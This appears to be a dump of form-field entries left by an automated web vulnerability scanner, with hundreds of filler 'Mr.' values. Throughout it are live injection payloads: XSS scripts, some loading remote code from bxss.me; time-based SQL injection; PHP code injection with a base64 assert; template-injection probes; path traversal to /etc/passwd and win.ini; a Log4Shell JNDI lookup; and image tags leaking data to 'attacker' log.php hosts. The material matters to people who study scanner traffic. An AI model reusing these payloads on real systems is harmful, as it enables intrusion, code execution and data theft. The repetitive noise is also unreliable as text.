acux3448%C0%BEz1%C0%BCz2a%90bcxuca3448

acu3293<s1﹥s2ʺs3ʹuca3293

Mr.9889032

'"()&%<acx><ScRiPt >NYMn(9355)</ScRiPt>

Mr.'"()&%<acx><ScRiPt >NYMn(9974)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

<!--

Mr.

'"

Mr.

Mr.

Mr.

Mr.

http://hitopdckqaacd.bxss.me/

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${@print(md5(31337))}\

'.print(md5(31337)).'

';print(md5(31337));$a='

Mr.

${@print(md5(31337))}

Mr.

Mr.

/xfs.bxss.me

Mr.

";print(md5(31337));$a="

Mr.

Mr.

Mr.

1%00%C0%A7%C0%A2%252527%252522

JLaKbveE')) OR 538=(SELECT 538 FROM PG_SLEEP(15))--

Mr.

1'"

gDDgHAYj') OR 519=(SELECT 519 FROM PG_SLEEP(15))--

Mr.

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

create/.

Mr.

@@joBLC

create

Mr.

Mr.

Mr.

create

Mr.

jK6dSbIk'; waitfor delay '0:0:15' --

Mr.

1 waitfor delay '0:0:15' --

9bNawqsd' OR 399=(SELECT 399 FROM PG_SLEEP(15))--

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

Mr.

Mr.

Mr.

Mr.

HttP://bxss.me/t/xss.html?%00

if(now()=sysdate(),sleep(15),0)

Mr.

Mr.

-1" OR 2+837-837-1=0+0+0+1 --

Mr.

Mr.

Mr.

Mr.

-1 OR 2+511-511-1=0+0+0+1 --

Mr.

-1 OR 2+579-579-1=0+0+0+1

Mr.

-1' OR 2+350-350-1=0+0+0+1 or 'g3rOTRE9'='

bxss.me/t/xss.html?%00

Mr.

-1' OR 2+392-392-1=0+0+0+1 --

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"()

^(#$!@#$)(()))******

Mr.

Mr.

Mr.

Mr.

!(()&&!|*|*|

)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

http://bxss.me/t/fit.txt?.

Mr.

Mr.

Http://bxss.me/t/fit.txt

Mr.

Mr.

1some_inexistent_file_with_long_name.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${9999340+9999782}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../Mr.

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

"+response.write(9786756*9249672)+"

Mr.

Mr.

Mr.

'+response.write(9786756*9249672)+'

Mr.

Mr.

Mr.

response.write(9786756*9249672)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${j${::-n}di:dns${::-:}//hitczsmejbdwe6f399${::-.}bxss.me}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

%4D%72%2E%39%36%38%37%27%28%29%3B%7D%5D%39%34%32%32

Mr.</script><script>1g78(9320)</script>

Mr.9654'();}]9358

Mr.<abhb2Ph<

Mr.<img sRc='http://attacker-9826/log.php?

Mr.<ifRAme sRc=9375.com></IfRamE>

Mr.<ajbQRQm x=9442>

Mr.<WJCBRD>F3D7V[!+!]</WJCBRD>

Mr.p8OcE <ScRiPt >1g78(9689)</ScRiPt>

Mr.}body{acu:Expre/**/SSion(1g78(9807))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

Mr.<input autofocus onfocus=1g78(9267)>

%F6<img%20acu%20onmouseover=1g78(97111)%20//%F6>

Mr.&lt;ScRiPt&gt;1g78(9121)&lt;/sCripT&gt;

Mr.\u003CScRiPt\1g78(9532)\u003C/sCripT\u003E

Mr.<img/src=">" onerror=alert(9526)>

Mr.<img src=xyz OnErRor=1g78(9311)>

Mr.<body onload=1g78(9412)>

Mr.<img src=//xss.bxss.me/t/dot.gif onload=1g78(9950)>

Mr.<svg%09%0A%0B%0C%0D%A0%00onload=1g78(9398);>

Mr.<isindex type=image src=1 onerror=1g78(9484)>

Mr.<ScRiPt >1g78(9917)</ScRiPt>

Mr.<ScRiPt >1g78(9450)</ScRiPt>

Mr.<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9951></ScRiPt>

Mr.<ScR<ScRiPt>IpT>1g78(9731)</sCr<ScRiPt>IpT>

Mr.<WGCR78>2PK8Q[!+!]</WGCR78>

Mr.<script>1g78(9701)</script>

Mr.<ScRiPt >1g78(9531)</ScRiPt>

acx__${98991*97996}__::.x

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx{{98991*97996}}xca

acx[[${98991*97996}]]xca

<th:t="${acx}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

<%={{={@{#{${acx}}%>

acu2076<s1﹥s2ʺs3ʹuca2076

acux4693%C0%BEz1%C0%BCz2a%90bcxuca4693

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acx__${98991*97996}__::.x

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

acx{{98991*97996}}xca

acx[[${98991*97996}]]xca

<%={{={@{#{${acx}}%>

<th:t="${acx}#foreach

acux4065%C0%BEz1%C0%BCz2a%90bcxuca4065

Mr.9356873

acu4335<s1﹥s2ʺs3ʹuca4335

'"()&%<acx><ScRiPt >1g78(9688)</ScRiPt>

Mr.'"()&%<acx><ScRiPt >1g78(9121)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.</script><script>qeoO(9935)</script>

%4D%72%2E%39%38%37%32%27%28%29%3B%7D%5D%39%38%39%32

Mr.

Mr.

Mr.

Mr.9060'();}]9527

Mr.

Mr.

Mr.<aq6zmrE<

Mr.<img sRc='http://attacker-9423/log.php?

Mr.

Mr.

Mr.

Mr.

http://hithzwypivdlu.bxss.me/

Mr.<ifRAme sRc=9611.com></IfRamE>

Mr.

Mr.<aIBAohl x=9809>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

<!--

Mr.

'"

Mr.

Mr.

Mr.

Mr.

Mr.<WED8F6>J5WOS[!+!]</WED8F6>

Mr.

Mr.

Mr.

Mr.

Mr.P2LBK <ScRiPt >qeoO(9865)</ScRiPt>

Mr.

Mr.}body{acu:Expre/**/SSion(qeoO(9855))}

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

<a HrEF=jaVaScRiPT:>

Mr.

Mr.

Mr.<input autofocus onfocus=qeoO(9697)>

Mr.

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.

Mr.

create

Mr.

Mr.

Mr.

create/.

Mr.

Mr.&lt;ScRiPt&gt;qeoO(9318)&lt;/sCripT&gt;

%F6<img%20acu%20onmouseover=qeoO(99021)%20//%F6>

create

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me/t/xss.html?%00

Mr.

Mr.\u003CScRiPt\qeoO(9049)\u003C/sCripT\u003E

Mr.

Mr.

Mr.

Mr.

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<img/src=">" onerror=alert(9658)>

Mr.

Mr.

Mr.

Mr.</script><script>eOc6(9462)</script>

%4D%72%2E%39%35%33%36%27%28%29%3B%7D%5D%39%34%33%34

Mr.<img src=xyz OnErRor=qeoO(9936)>

Mr.

Mr.

Mr.

Mr.

Mr.<aIHyM8m<

Mr.

Mr.

Mr.

Mr.

Mr.9069'();}]9234

Mr.<img src=//xss.bxss.me/t/dot.gif onload=qeoO(9039)>

Mr.

Mr.<img sRc='http://attacker-9656/log.php?

Mr.

Mr.

${@print(md5(31337))}\

Mr.

'.print(md5(31337)).'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

${@print(md5(31337))}

";print(md5(31337));$a="

Mr.<afYqsIq x=9354>

Mr.<ifRAme sRc=9505.com></IfRamE>

Mr.<WXHY2F>FQL4O[!+!]</WXHY2F>

Mr.<body onload=qeoO(9224)>

';print(md5(31337));$a='

Mr.ie3gt <ScRiPt >eOc6(9492)</ScRiPt>

Mr.

Mr.

Mr.

Mr.<isindex type=image src=1 onerror=qeoO(9682)>

Mr.

Mr.}body{acu:Expre/**/SSion(eOc6(9878))}

Mr.

Mr.

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

Mr.

Mr.<svg%09%0A%0B%0C%0D%A0%00onload=qeoO(9436);>

Mr.

Mr.

Mr.<input autofocus onfocus=eOc6(9215)>

Mr.

Mr.

Mr.

Mr.\u003CScRiPt\eOc6(9845)\u003C/sCripT\u003E

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

%F6<img%20acu%20onmouseover=eOc6(93361)%20//%F6>

Mr.&lt;ScRiPt&gt;eOc6(9405)&lt;/sCripT&gt;

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<ScRiPt >qeoO(9006)</ScRiPt>

Mr.

Mr.

Mr.<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9493></ScRiPt>

Mr.

Mr.

Mr.<img src=xyz OnErRor=eOc6(9157)>

Mr.<img src=//xss.bxss.me/t/dot.gif onload=eOc6(9296)>

Mr.<img/src=">" onerror=alert(9235)>

Mr.<ScRiPt >qeoO(9353)</ScRiPt>

Mr.

Mr.

Mr.<isindex type=image src=1 onerror=eOc6(9416)>

Mr.

Mr.

Mr.<ScR<ScRiPt>IpT>qeoO(9413)</sCr<ScRiPt>IpT>

Mr.

Mr.

Mr.<body onload=eOc6(9830)>

Mr.

Mr.

Mr.

Mr.<script>qeoO(9069)</script>

Mr.<svg%09%0A%0B%0C%0D%A0%00onload=eOc6(9591);>

Mr.<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9087></ScRiPt>

Mr.

Mr.<ScRiPt >eOc6(9337)</ScRiPt>

Mr.

Mr.

Mr.<script>eOc6(9733)</script>

Mr.<WT7FCZ>UYAGU[!+!]</WT7FCZ>

Mr.<ScRiPt >qeoO(9419)</ScRiPt>

Mr.<ScR<ScRiPt>IpT>eOc6(9233)</sCr<ScRiPt>IpT>

Mr.<ScRiPt >eOc6(9930)</ScRiPt>

Mr.

acx__${98991*97996}__::.x

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

Mr.<ScRiPt >eOc6(9148)</ScRiPt>

Mr.

Mr.<WVXJ7U>DJTNI[!+!]</WVXJ7U>

Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

acx{{98991*97996}}xca

acx[[${98991*97996}]]xca

acx__${98991*97996}__::.x

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

Mr.

Mr.

Mr.

<th:t="${acx}#foreach

acux7148%C0%BEz1%C0%BCz2a%90bcxuca7148

Mr.

acx[[${98991*97996}]]xca

<%={{={@{#{${acx}}%>

Mr.

acx{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

Mr.

Mr.

Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acu2702<s1﹥s2ʺs3ʹuca2702

Mr.

acx__${98991*97996}__::.x

acx[[${98991*97996}]]xca

<th:t="${acx}#foreach

acx{{98991*97996}}xca

<%={{={@{#{${acx}}%>

Mr.

acux8043%C0%BEz1%C0%BCz2a%90bcxuca8043

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

Mr.

<th:t="${acx}#foreach

acux1307%C0%BEz1%C0%BCz2a%90bcxuca1307

acu6687<s1﹥s2ʺs3ʹuca6687

<%={{={@{#{${acx}}%>

Mr.

'"()&%<acx><ScRiPt >eOc6(9330)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.9341169

Mr.

acu1828<s1﹥s2ʺs3ʹuca1828

acx__${98991*97996}__::.x

Mr.'"()&%<acx><ScRiPt >eOc6(9970)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

acx[[${98991*97996}]]xca

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"()

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

!(()&&!|*|*|

Mr.

Mr.

)

Mr.

Mr.

^(#$!@#$)(()))******

acx{{98991*97996}}xca

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1some_inexistent_file_with_long_name.

Mr.

http://bxss.me/t/fit.txt?.

Mr.

Mr.

Mr.

bxss.me

Mr.

Http://bxss.me/t/fit.txt

Mr.

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

<th:t="${acx}#foreach

Mr.

Mr.

<%={{={@{#{${acx}}%>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

acux2451%C0%BEz1%C0%BCz2a%90bcxuca2451

Mr.

Mr.

Mr.

acu8397<s1﹥s2ʺs3ʹuca8397

Mr.9603629

Mr.

Mr.

'"()&%<acx><ScRiPt >qeoO(9663)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

${9999369+10000143}

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.'"()&%<acx><ScRiPt >qeoO(9222)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1 waitfor delay '0:0:15' --

lCyQn0BS') OR 642=(SELECT 642 FROM PG_SLEEP(15))--

1'"

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

iTPeTpNR' OR 784=(SELECT 784 FROM PG_SLEEP(15))--

1%00%C0%A7%C0%A2%252527%252522

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

SMQNalLd'; waitfor delay '0:0:15' --

@@WFWbg

Uk4NJdN7')) OR 615=(SELECT 615 FROM PG_SLEEP(15))--

-1" OR 2+465-465-1=0+0+0+1 --

Mr.

-1' OR 2+93-93-1=0+0+0+1 --

Mr.

Mr.

Mr.

-1 OR 2+556-556-1=0+0+0+1

Mr.

Mr.

Mr.

if(now()=sysdate(),sleep(15),0)

-1 OR 2+321-321-1=0+0+0+1 --

Mr.

-1' OR 2+532-532-1=0+0+0+1 or 'LIWKKyHG'='

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

response.write(9533669*9275774)

Mr.

"+response.write(9533669*9275774)+"

Mr.

'+response.write(9533669*9275774)+'

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${j${::-n}di:dns${::-:}//hitmyfgysuvhcd478a${::-.}bxss.me}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"

<!--

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

http://hitcoxabsfjeg.bxss.me/

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create

Mr.

create/.

Mr.

create

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me/t/xss.html?%00

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'.print(md5(31337)).'

Mr.

${@print(md5(31337))}

Mr.

Mr.

Mr.

Mr.

${@print(md5(31337))}\

';print(md5(31337));$a='

";print(md5(31337));$a="

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

@@3Ed4L

1%00%C0%A7%C0%A2%252527%252522

Mr.

Mr.

Mr.

1 waitfor delay '0:0:15' --

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

4VwTB0he')) OR 192=(SELECT 192 FROM PG_SLEEP(15))--

Mr.

2FSWnR4C'; waitfor delay '0:0:15' --

if(now()=sysdate(),sleep(15),0)

zck64mii') OR 202=(SELECT 202 FROM PG_SLEEP(15))--

Mr.

1'"

Q6hkqW1Y' OR 121=(SELECT 121 FROM PG_SLEEP(15))--

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

-1" OR 2+279-279-1=0+0+0+1 --

-1 OR 2+261-261-1=0+0+0+1

Mr.

-1' OR 2+380-380-1=0+0+0+1 or 'NvxRkCws'='

Mr.

-1 OR 2+862-862-1=0+0+0+1 --

-1' OR 2+653-653-1=0+0+0+1 --

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"()

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

^(#$!@#$)(()))******

Mr.

Mr.

Mr.

Mr.

!(()&&!|*|*|

Mr.

Mr.

)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

http://bxss.me/t/fit.txt?.

Mr.

bxss.me

Http://bxss.me/t/fit.txt

Mr.

Mr.

1some_inexistent_file_with_long_name.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${9999736+9999124}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

Mr.

../Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.</script><script>1msj(9254)</script>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.9836'();}]9434

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<aNfhpLu<

Mr.

Mr.

%4D%72%2E%39%33%35%34%27%28%29%3B%7D%5D%39%36%30%30

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<ifRAme sRc=9197.com></IfRamE>

Mr.

Mr.

Mr.

Mr.

Mr.<anq6USH x=9831>

Mr.

Mr.<img sRc='http://attacker-9350/log.php?

Mr.

Mr.<WQAWWW>RPK4R[!+!]</WQAWWW>

Mr.

Mr.

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

Mr.

Mr.}body{acu:Expre/**/SSion(1msj(9894))}

Mr.

Mr.NfMbc <ScRiPt >1msj(9655)</ScRiPt>

Mr.

Mr.

Mr.

%F6<img%20acu%20onmouseover=1msj(94341)%20//%F6>

Mr.

Mr.

Mr.

Mr.

Mr.<input autofocus onfocus=1msj(9239)>

"+response.write(9845256*9745848)+"

response.write(9845256*9745848)

Mr.

'+response.write(9845256*9745848)+'

Mr.&lt;ScRiPt&gt;1msj(9000)&lt;/sCripT&gt;

Mr.\u003CScRiPt\1msj(9540)\u003C/sCripT\u003E

Mr.

Mr.

Mr.<body onload=1msj(9764)>

Mr.

Mr.

Mr.

Mr.<img/src=">" onerror=alert(9934)>

Mr.<img src=//xss.bxss.me/t/dot.gif onload=1msj(9214)>

Mr.

Mr.

Mr.

Mr.

Mr.<img src=xyz OnErRor=1msj(9394)>

Mr.

Mr.

Mr.

Mr.

Mr.<isindex type=image src=1 onerror=1msj(9016)>

Mr.

Mr.

Mr.

Mr.

Mr.<svg%09%0A%0B%0C%0D%A0%00onload=1msj(9862);>

Mr.

Mr.

Mr.

Mr.<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9715></ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<ScRiPt >1msj(9159)</ScRiPt>

Mr.

Mr.

Mr.

Mr.<script>1msj(9124)</script>

Mr.<WCIFC0>NJPTQ[!+!]</WCIFC0>

Mr.<ScRiPt >1msj(9464)</ScRiPt>

Mr.<ScR<ScRiPt>IpT>1msj(9729)</sCr<ScRiPt>IpT>

${j${::-n}di:dns${::-:}//hitnhfyugfcoxec3a6${::-.}bxss.me}

Mr.

Mr.

acx__${98991*97996}__::.x

Mr.

Mr.

Mr.

Mr.<ScRiPt >1msj(9344)</ScRiPt>

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

<th:t="${acx}#foreach

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

Mr.

acx{{98991*97996}}xca

Mr.

Mr.

acx[[${98991*97996}]]xca

Mr.

Mr.

Mr.

Mr.

Mr.

acu6370<s1﹥s2ʺs3ʹuca6370

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

<!--

Mr.

Mr.

<%={{={@{#{${acx}}%>

'"

acux8058%C0%BEz1%C0%BCz2a%90bcxuca8058

acx{{98991*97996}}xca

Mr.

acx__${98991*97996}__::.x

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

acx[[${98991*97996}]]xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

<th:t="${acx}#foreach

Mr.

acux2343%C0%BEz1%C0%BCz2a%90bcxuca2343

<%={{={@{#{${acx}}%>

Mr.

Mr.

acu5443<s1﹥s2ʺs3ʹuca5443

/xfs.bxss.me

Mr.

Mr.

Mr.

Mr.

'"()&%<acx><ScRiPt >1msj(9069)</ScRiPt>

Mr.9431176

Mr.'"()&%<acx><ScRiPt >1msj(9660)</ScRiPt>

Mr.

Mr.

Mr.

Mr.

Mr.

